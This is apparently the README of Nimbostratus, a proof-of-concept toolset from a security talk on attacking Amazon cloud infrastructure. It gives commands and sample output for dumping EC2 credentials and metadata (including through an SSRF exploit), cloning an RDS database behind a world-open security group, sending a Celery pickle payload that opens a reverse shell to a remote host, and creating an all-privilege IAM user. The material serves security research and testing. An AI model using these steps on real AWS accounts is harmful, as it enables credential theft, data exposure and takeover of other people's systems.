Nimbostratus
Tools for fingerprinting and exploiting Amazon cloud infrastructures. These tools are a PoC which I developed for my "Pivoting in Amazon clouds" talk, developed using the great boto library for accessing Amazon's API.
The nimbostratus toolset is usually used together with nimbostratus-target, which helps you setup a legal environment where this tool can be tested.
If you need help understanding what this toolset is all about, both my article on "Pivoting in Amazon clouds" and this speaker deck will be really useful. The guys at SecTor recorded my talk which can be found here
Feel free to report bugs, fork and send pull-requests. You can also drop me a line at @w3af.
Installation
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt
Usage
Providing AWS credentials
Some nimbostratus
sub-commands require you to provide AWS credentials. They are
provided using the following command line arguments:
--access-key
--secret-key
-
--token
, which is only used when the credentials were extracted from the instance profile.
Dump credentials
Identify the credentials available in this host and prints them out to the console. This is usually the first command to run after gaining access to an EC2 instance.
$ nimbostratus dump-credentials
Found credentials
Access key: ...
Secret key: ...
Once you've got the credentials from an EC2 instance you've exploited, you can continue to work from any other host with internet access (remember: EC2 instances are in many cases spawned for a specific task and then terminated).
IMPORTANT: This will extract information from boto
's credential configuration sources
and from the instance meta-data. If the system uses other libraries to connect to AWS
the credentials won't be dumped.
Dump permissions
This tool will dump all permissions for the provided credentials. This tool is commonly used
right after dump-credentials
to know which permissions are available for you.
$ nimbostratus dump-permissions --access-key=... --secret-key=...
Starting dump-permissions
These credentials belong to low_privileged_user, not to the root account
Getting access keys for user low_privileged_user
User for key AKIAIV...J6KVA is low_privileged_user
{u'Statement': [{u'Action': u'iam:*',
u'Effect': u'Allow',
u'Resource': u'*',
u'Sid': u'Stmt1377108934836'},
{u'Action': u'sqs:*',
u'Effect': u'Allow',
u'Resource': u'*',
u'Sid': u'Stmt1377109045369'}]}
Dump instance meta-data
All EC2 instances have meta-data which is accessible via http://169.254.169.254/latest/meta-data/. This tool will extract all the important information from the metadata and show it to you.
Keep in mind that each EC2 instance has its own http://169.254.169.254/
meta-data
provider and running this command on different instances will yield different results.
Extract meta-data for the instance where the command is being run:
$ nimbostratus dump-ec2-metadata
Starting dump-ec2-metadata
...
Instance type: t1.micro
AMI ID: ami-a02f66f2
Security groups: django_frontend_nimbostratus_sg
Availability zone: ap-southeast-1a
Architecture: x86_64
Private IP: 10.130.81.89
User data script was written to user-data.txt
Extract meta-data from a remote instance using an exploit defined in core.utils.mangle.mangle
:
$ nimbostratus dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
Starting dump-ec2-metadata
Request http://target.com/?url=http://169.254.169.254/...ta-data/
Request http://target.com/?url=http://169.254.169.254/...ta-data/instance-type
Request http://target.com/?url=http://169.254.169.254/...ta-data/instance-id
...
Instance type: t1.micro
AMI ID: ami-a02f66f2
Security groups: django_frontend_nimbostratus_sg
Availability zone: ap-southeast-1a
Architecture: x86_64
Private IP: 10.130.81.89
User data script was written to user-data.txt
Create DB snapshot
In some cases you've got Amazon credentials which allow you to access the RDS API but don't have any access to the database itself (MySQL user). This tool allows you to access the information stored in that database by creating a snapshot and restoring it.
$ nimbostratus snapshot-rds --access-key=... \
--secret-key=... \
--password foolmeonce --rds-name nimbostratus \
--region ap-southeast-1
Starting snapshot-rds
Waiting for snapshot to complete in AWS... (this takes at least 5m)
Waiting...
Waiting for restore process in AWS... (this takes at least 5m)
Waiting...
Creating a DB security group which allows connections from any location and
applying it to the newly created RDS instance. Anyone can connect to this
MySQL instance at:
- Host: restored....rds.amazonaws.com
- Port: 3306
Using root:
mysql -u root -pfoolmeonce -h restored....rds.amazonaws.com
Inject raw Celery message
Celery warns developers about the insecure pickle serialization method, but of course you'll find deployments like this in real life. This tool will check if the instance where this tool is being run has access to SQS, if that SQS has a Celery queue, verify that the Queue is using pickle and finally inject a raw message that will execute arbitrary commands when un-pickled.
$ nimbostratus celery-pickle-exploit --access-key=... \
--secret-key=... --reverse 1.2.3.4:4000 \
--queue-name nimbostratus-celery --region ap-southeast-1
Starting celery-exploit
SQS queue nimbostratus-celery is vulnerable
We can write to the SQS queue.
Start a netcat to listen for connections at 1.2.3.4:4000 and press enter.
Sent payload to SQS, wait for the reverse connection!
Create new user
If you've got credentials which allow you to create a new user using IAM this tool will create it (with permissions to access all Amazon resources) and return API key and secret.
$ nimbostratus create-iam-user --access-key=... --secret-key=...
Starting create-iam-user
Trying to create user "bdkgpnenu"
User "bdkgpnenu" created
Trying to create user "bdkgpnenu" access keys
Created access keys for user bdkgpnenu. Access key: ..., access secret: ...
Created user bdkgpnenu with ALL PRIVILEGES. User information:
* Access key: ...
* Secret key: ...
* Policy name: nimbostratusbdkgpnenu
What's a nimbostratus anyways?
nimbostratus is a type of cloud, if you ever started a project you know how hard it is to name it... so I just chose something that sounded "cool" and was "cloud-related".